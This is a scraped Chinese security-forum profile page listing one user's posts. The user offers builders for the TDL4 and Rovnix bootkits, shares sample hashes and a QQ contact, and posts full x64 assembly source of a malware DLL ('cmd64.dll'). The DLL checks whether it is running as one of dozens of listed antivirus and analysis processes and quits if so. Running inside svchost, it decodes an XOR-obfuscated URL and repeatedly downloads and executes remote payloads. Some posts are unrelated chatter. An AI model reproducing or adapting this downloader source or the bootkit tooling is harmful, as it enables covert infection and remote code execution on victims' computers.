|
|
|
[原创]新人发个小软件,TDL4 的生成器
使用2012年1月份的样本做的 TDL4组件: ph.dll phx.dll phln phlx phld phdx phd phdata phs 最近还写了个感染VBR病毒 的生成器支持32/64位系统。名字叫:Rovnix |
|
[求助]关于TDL4 BK在win7 真机64位上挂掉的问题
64位的rootkit主要在国外有,国内没见过。 Win64/Olmarik(TDL4);感染MBR 32位/64位 Win64/Olmasco(MaxSS;感染MBR.VBR.创建活动的隐藏分区 32位/64位 Win64/Rovnix/Carberp;感染VBR 32位/64位 Win64/Sirefef(ZeroAccess);感染驱动.MBR 32位/64位 Win32/Gapz;感染VBR 32位/64位 |
|
[求助]关于TDL4 BK在win7 真机64位上挂掉的问题
XPAJ感染系统文件,很容易就被发现的。不隐蔽啊! |
|
[求助]关于TDL4 BK在win7 真机64位上挂掉的问题
哥们是玩病毒的吗?我手里有逆向好的Rovnix(Cidox),已经写好了生成器。想要联系我,QQ:958716364. Rovnix比TDL4厉害多了。 |
|
[求助]关于TDL4 BK在win7 真机64位上挂掉的问题
试一下我逆的这两个怎么样,MaxSS有检测虚拟机的功能啊!TDL4是2012年1月份的样本。 SHA256: 9746b4f684b9d7d346ff131cd024e68d1b06e1b81571ce6d3c5067f0829d7932 SHA1: 6d07cf72201234a07ab57fb3fc00b9e5a0b3678e MD5: a1b3e59ae17ba6f940afaf86485e5907 File size: 127.5 KB ( 130560 bytes ) File name: w.php.exe File type: Win32 EXE 样本介绍:http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html (需要代理) http://blog.eset.com/2012/02/02/tdl4-reloaded-purple-haze-all-in-my-brain |
|
[分享]我要挣很多钱,去救济那些看了让人心酸的穷苦老人!
我们个人的力量实在太小了,需要政府的努力才行!有人大吃大喝花天酒地,有人却连吃饭却都是问题,一旦没有工作,没有经济来源,就只能等死了。。。这就是中国!邓小平改革开放的目的就是缩小贫富差距,让有钱人帮助穷人。但是现在的人太现实了。。 |
|
[原创]新人发个小软件,TDL4 的生成器
蓝屏很正常,蓝屏的作用就是重启电脑。TDL4已经运行成功了! |
|
本人22岁矿山临时工想学习汇编,没有基础初中毕业
这位同学,只要你有耐心就绝对能成功的!告诉你吧,我连小学都没毕业呢就辍学了。 兴趣是最好的老师,也是最强劲的动力。只要你喜欢这一行,什么都不是问题!加油!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
|
[分享]《交易》五分钟微电影,当女孩说出那句话,你能忍住眼泪嘛吗?
我相信在世界上还有很多这样的事情!这个残酷而又无情的世界!2012为啥没有世界毁灭阿!我恨死这个无情的世界了! |
|
[原创]新人发个小软件,TDL4 的生成器
蓝屏重启是正常现象。我保证绝对没有后门。我对灯发誓,如果有后门,立刻就没电。 includelib G:\RadASM\Masm64\SDK\Lib\kernel32.lib includelib G:\RadASM\Masm64\SDK\Lib\user32.lib includelib G:\RadASM\Masm64\SDK\Lib\urlmon.lib includelib G:\RadASM\Masm64\SDK\Lib\Shlwapi.lib EXTERN CreateThread :proc EXTERN DisableThreadLibraryCalls :proc EXTERN Sleep :proc EXTERN LoadLibraryA :proc ; EXTERN URLDownloadToFileA :proc EXTERN GetFileAttributesA :proc EXTERN WinExec :proc EXTERN GetTempPathA :proc EXTERN GetTempFileNameA :proc EXTERN GetModuleFileNameA :proc EXTERN GetProcAddress :proc ; EXTERN CreateMutexA :proc EXTERN CloseHandle :proc EXTERN DeleteFileA :proc EXTERN ExitProcess :proc EXTERN PathFindFileNameA :proc EXTERN GetCommandLineA :proc EXTERN StrStrIA :proc ; EXTERN MessageBoxA :proc EXTERN QueueUserWorkItem :proc EXTERN GetModuleHandleA :proc .data URL db "1111",0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 Urlmon db "Urlmon.dll",0 URLDown db "URLDownloadToFileA",0 stricmp db "_stricmp",0 ntdll db "ntdll.dll",0 netsvcs db "netsvcs",0 svchost db "svchost.exe",0 XueTr db "XueTr.exe",0 PowerTool db "PowerTool.exe",0 UfSeAgnt db "UfSeAgnt.exe",0 ;趋势 TMBMSRV db "TMBMSRV.exe",0 ;趋势 SfCtlCom db "SfCtlCom.exe",0 ;趋势 TmProxy db "TmProxy.exe",0 ;趋势 bdagent db "bdagent.exe",0 ;罗马尼亚反病毒软件 livesrv db "livesrv.exe",0 ;罗马尼亚杀毒软件在线升级程序 seccenter db "seccenter.exe",0 ;马尼亚反病毒软件 vsserv db "vsserv.exe",0 ;马尼亚反病毒软件 MPSVC db "MPSVC.exe",0 ;微点主动防御 MPSVC1 db "MPSVC1.exe",0 MPSVC2 db "MPSVC2.exe",0 MPMon db "MPMon.exe",0 ;微点主动防御 ast db "ast.exe",0 ;超级巡警 xiufu db "gmer.exe",0 avp db "avp.exe",0 ;卡巴斯基 egui db "egui.exe",0 ;Eset NOD32 ccSvcHst db "ccSvcHst.exe",0;诺顿 mcagent db "mcagent.exe",0 ;麦咖啡 mcmscsvc db "mcmscsvc.exe",0 McNASvc db "McNASvc.exe",0 Mcods db "Mcods.exe",0 McProxy db "McProxy.exe",0 Mcshield db "Mcshield.exe",0 mcsysmon db "mcsysmon.exe",0 mcvsshld db "mcvsshld.exe",0 MpfSrv db "MpfSrv.exe",0 McSACore db "McSACore.exe",0 msksrver db "msksrver.exe",0 sched db "sched.exe",0 ;小红伞 avguard db "avguard.exe",0 avmailc db "avmailc.exe",0 avwebgrd db "avwebgrd.exe",0 avgnt db "avgnt.exe",0 avcenter db "avcenter.exe",0 afwServ db "afwServ.exe",0 AvastUI db "AvastUI.exe",0 FilMsg db "FilMsg.exe",0;费尔 Twister db "Twister.exe",0 dwengine db "dwengine.exe",0;大蜘蛛 spidernt db "spidernt.exe",0;驱逐舰 spiderui db "spiderui.exe",0 spideragent db "spideragent.exe",0 SpIDerMl db "SpIDerMl.exe",0 avfwsvc db "avfwsvc.exe",0 avshadow db "avshadow.exe",0;小红伞 avgcsrvx db "avgcsrvx.exe",0;AVG avgemc db "avgemc.exe",0 avgnsx db "avgnsx.exe",0 avgrsx db "avgrsx.exe",0 avgtray db "avgtray.exe",0 avgwdsvc db "avgwdsvc.exe",0 Hstricmp QWORD 0 ;stricmp函数的地址 hInst QWORD 0 reason QWORD 0 reserved1 QWORD 0 .code Entry proc ;hInst:qword, reason:qword, reserved1:qword push rbp mov rbp,rsp mov hInst,rcx mov reason,rdx mov reserved1,r8 sub rsp,10h ; 按照参数个数分配堆栈 and spl,0F0H ;平衡堆栈 cmp reason,1 jnz @1 call kiil jmp @2 @1: mov rcx,hInst call DisableThreadLibraryCalls;禁止DLL_THREAD_ATTACH和DLL_THREAD_DETACH通知指定的动态链接库 push 1 pop rax @2: mov rsp,rbp pop rbp ret Entry Endp XIAZAI proc LOCAL _URL[80] :BYTE LOCAL lpHandles : QWORD LOCAL IpURLDown : QWORD LOCAL TempPath[260] :BYTE sub rsp,30h and spl,0F0H mov rcx,60000 call Sleep lea rcx,Urlmon call LoadLibraryA mov rcx,rax lea rdx,URLDown call GetProcAddress mov IpURLDown,rax lea rbx, URL lea rdx,_URL mov rcx,76 @w: mov r8b,[rbx] cmp r8b,0 jz @r xor r8b,15h mov [rdx],r8b inc rbx inc rdx loop @w @r: xor r8w,r8w mov [rdx],r8w @9: mov lpHandles ,0 mov rcx,260 lea rdx,TempPath call GetTempPathA lea rcx,TempPath xor rdx,rdx xor r8,r8 lea r9,TempPath call GetTempFileNameA @6: xor rcx,rcx lea rdx,_URL lea r8,TempPath xor r9,r9 mov [rsp+4*8],r9 call IpURLDown;下载文件 OR EAX,EAX jnz @3 lea rcx, TempPath call GetFileAttributesA ;检索文件属性 cmp EAX, -1 je @3 lea rcx, TempPath mov rdx,0 call WinExec ;运行文件 mov lpHandles ,1 mov rcx,60000 call Sleep lea rcx,TempPath call DeleteFileA @3: mov rcx,10000 call Sleep cmp lpHandles ,1 je @5 jmp @6 @5: mov rcx,3600000 call Sleep jmp @9 ret XIAZAI endp kiil proc LOCAL Gfilename [260] :BYTE LOCAL shuzu [54] :QWORD LOCAL Command :QWORD;命令行指针 LOCAL ssss :QWORD;文件名字指针 LOCAL pppp :QWORD;存放特征名字地址 sub rsp,30h and spl,0F0h mov rax,offset avgwdsvc mov shuzu ,rax mov rax,offset avgtray mov shuzu+1*8, rax mov rax,offset avgrsx mov shuzu+2*8, rax mov rax,offset avgnsx mov shuzu+3*8, rax mov rax,offset XueTr mov shuzu+4*8, rax mov rax,offset PowerTool mov shuzu+5*8, rax mov rax,offset UfSeAgnt mov shuzu+6*8, rax mov rax,offset TMBMSRV mov shuzu+7*8, rax mov rax,offset SfCtlCom mov shuzu+8*8, rax mov rax,offset TmProxy mov shuzu+9*8, rax mov rax,offset avshadow mov shuzu+10*8, rax mov rax,offset avgcsrvx mov shuzu+11*8, rax mov rax,offset avgemc mov shuzu+12*8, rax mov rax,offset bdagent mov shuzu+13*8, rax mov rax,offset livesrv mov shuzu+14*8, rax mov rax,offset seccenter mov shuzu+15*8, rax mov rax,offset vsserv mov shuzu+16*8, rax mov rax,offset MPSVC mov shuzu+17*8, rax mov rax,offset MPSVC1 mov shuzu+18*8, rax mov rax,offset MPSVC2 mov shuzu+19*8, rax mov rax,offset MPMon mov shuzu+20*8, rax mov rax,offset ast mov shuzu+21*8, rax mov rax,offset avfwsvc mov shuzu+22*8, rax mov rax,offset xiufu mov shuzu+23*8, rax mov rax,offset avp mov shuzu+24*8, rax mov rax,offset spidernt mov shuzu+25*8, rax mov rax,offset spiderui mov shuzu+26*8, rax mov rax,offset spideragent mov shuzu+27*8, rax mov rax,offset SpIDerMl mov shuzu+28*8, rax mov rax,offset Twister mov shuzu+29*8, rax mov rax,offset dwengine mov shuzu+30*8, rax mov rax,offset egui mov shuzu+31*8, rax mov rax,offset ccSvcHst mov shuzu+32*8, rax mov rax,offset mcagent mov shuzu+33*8, rax mov rax,offset mcmscsvc mov shuzu+34*8, rax mov rax,offset McNASvc mov shuzu+35*8, rax mov rax,offset Mcods mov shuzu+36*8, rax mov rax,offset McProxy mov shuzu+37*8, rax mov rax,offset Mcshield mov shuzu+38*8, rax mov rax,offset mcsysmon mov shuzu+39*8, rax mov rax,offset mcvsshld mov shuzu+40*8, rax mov rax,offset MpfSrv mov shuzu+41*8, rax mov rax,offset McSACore mov shuzu+42*8, rax mov rax,offset msksrver mov shuzu+43*8, rax mov rax,offset sched mov shuzu+44*8, rax mov rax,offset avguard mov shuzu+45*8, rax mov rax,offset avmailc mov shuzu+46*8, rax mov rax,offset avwebgrd mov shuzu+47*8, rax mov rax,offset avgnt mov shuzu+48*8, rax mov rax,offset avcenter mov shuzu+49*8, rax mov rax,offset afwServ mov shuzu+50*8, rax mov rax,offset AvastUI mov shuzu+51*8, rax mov rax,offset FilMsg mov shuzu+52*8, rax xor rax,rax mov shuzu+53*8,rax lea rcx,ntdll call GetModuleHandleA ;////////////////////////////////////////////////////////////////// mov rcx,rax lea rdx,stricmp call GetProcAddress mov Hstricmp,rax xor rcx,rcx lea rdx,Gfilename mov r8,260 call GetModuleFileNameA;获取文件路径 lea rcx,Gfilename call PathFindFileNameA ;获取文件名字 mov ssss ,rax call GetCommandLineA ;获取命令行 mov Command,rax lea rax,shuzu mov pppp,rax @4: mov rdx, ssss mov rax, pppp mov rcx,[rax] call Hstricmp cmp rax,0 jnz @3 xor rcx,rcx call ExitProcess @3: add pppp,8 mov rax,pppp cmp QWORD ptr [rax],0 jnz @4 lea rcx,svchost mov rdx, ssss call Hstricmp ;字符转比较 cmp rax,0 jnz @8 mov rcx,Command lea rdx,netsvcs call StrStrIA ;字符转搜索 test rax,rax je @8 xor rcx,rcx xor rdx,rdx lea r8,XIANCHENG xor r9,r9 mov [rsp+4*8],r9 mov [rsp+5*8],r9 call CreateThread;创建下载线程 mov rcx,rax call CloseHandle mov rax,1 jmp @s @8: xor rax,rax @s: ret kiil endp XIANCHENG proc push rbp mov rbp,rsp sub rsp,20h and spl,0F0h lea rcx,XIAZAI xor rdx,rdx mov r8,10h ;WT_EXECUTELONGFUNCTION call QueueUserWorkItem mov rsp,rbp pop rbp ret XIANCHENG endp END 这个是cmd64.dll的源代码 |
|
[分享]逆向整理包编译通过版鬼影3.0代码~
楼主好厉害啊! |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值